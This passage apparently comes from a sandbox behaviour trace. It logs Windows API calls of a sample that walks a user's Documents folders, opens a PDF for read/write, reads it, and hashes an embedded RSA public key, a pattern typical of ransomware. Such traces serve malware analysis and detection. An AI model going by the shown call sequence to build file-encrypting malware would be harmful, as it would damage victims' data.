dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.361] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\") returned="RAN3RZLWQzdFaTXUwx\\" [0200.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0200.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0200.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.362] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\") returned="4E_Qp5b8\\" [0200.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0200.362] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\") returned="HIm fL\\" [0200.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fba58 [0200.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.362] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0200.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05828 [0200.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fba58 | out: hHeap=0x2c0000) returned 1 [0200.363] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0200.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05828 | out: hHeap=0x2c0000) returned 1 [0200.363] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.364] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.364] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.364] PathFindFileNameW (pszPath="") returned="" [0200.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.364] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc229efd0, ftCreationTime.dwHighDateTime=0x1d89c73, ftLastAccessTime.dwLowDateTime=0xb4db35b0, ftLastAccessTime.dwHighDateTime=0x1d89ed4, ftLastWriteTime.dwLowDateTime=0xb4db35b0, ftLastWriteTime.dwHighDateTime=0x1d89ed4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05e28 [0200.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.367] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc229efd0, ftCreationTime.dwHighDateTime=0x1d89c73, ftLastAccessTime.dwLowDateTime=0xb4db35b0, ftLastAccessTime.dwHighDateTime=0x1d89ed4, ftLastWriteTime.dwLowDateTime=0xb4db35b0, ftLastWriteTime.dwHighDateTime=0x1d89ed4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.367] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7548f260, ftCreationTime.dwHighDateTime=0x1d89e8a, ftLastAccessTime.dwLowDateTime=0x59dc3c00, ftLastAccessTime.dwHighDateTime=0x1d8a6d5, ftLastWriteTime.dwLowDateTime=0x59dc3c00, ftLastWriteTime.dwHighDateTime=0x1d8a6d5, nFileSizeHigh=0x0, nFileSizeLow=0x4a72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AFrd4UxBD1.pdf", cAlternateFileName="AFRD4U~1.PDF")) returned 1 [0200.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x2a19588 [0200.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.368] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\AFrd4UxBD1.pdf") returned=".pdf" [0200.368] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\AFrd4UxBD1.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\afrd4uxbd1.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0200.368] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=19058) returned 1 [0200.368] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0200.371] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x4a4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.371] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.373] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.374] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4a72, lpOverlapped=0x0) returned 1 [0200.379] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a79478 [0200.380] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.380] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.380] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31bca0) returned 1 [0200.381] CryptCreateHash (in: hProv=0x31bca0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0200.381] CryptHashData (hHash=0x2a05d28, pbData=0x2a79478, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.381] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0200.381] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0200.381] GetLastError () returned 0x0 [0200.381] CryptDestroyHash (hHash=0x2a05d28) returned 1 [0200.381] CryptReleaseContext (hProv=0x31bca0, dwFlags=0x0) returned 1 [0200.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.382] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0200.382] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0200.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.383] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0200.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4a70) returned 0x2afb168 [0200.383] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a79478 [0200.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05828 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b90 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05870 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0200.384] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0200.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0200.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0200.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6ba8 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x29dcde8 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0200.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0200.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a197b8 [0200.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0200.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0200.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0200.387] GetCurrentThreadId () returned 0x5d8 [0200.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0200.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af6140 [0200.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42628 [0200.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.388] GetCurrentThreadId () returned 0x5d8 [0200.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x29dcde8 [0200.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0200.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 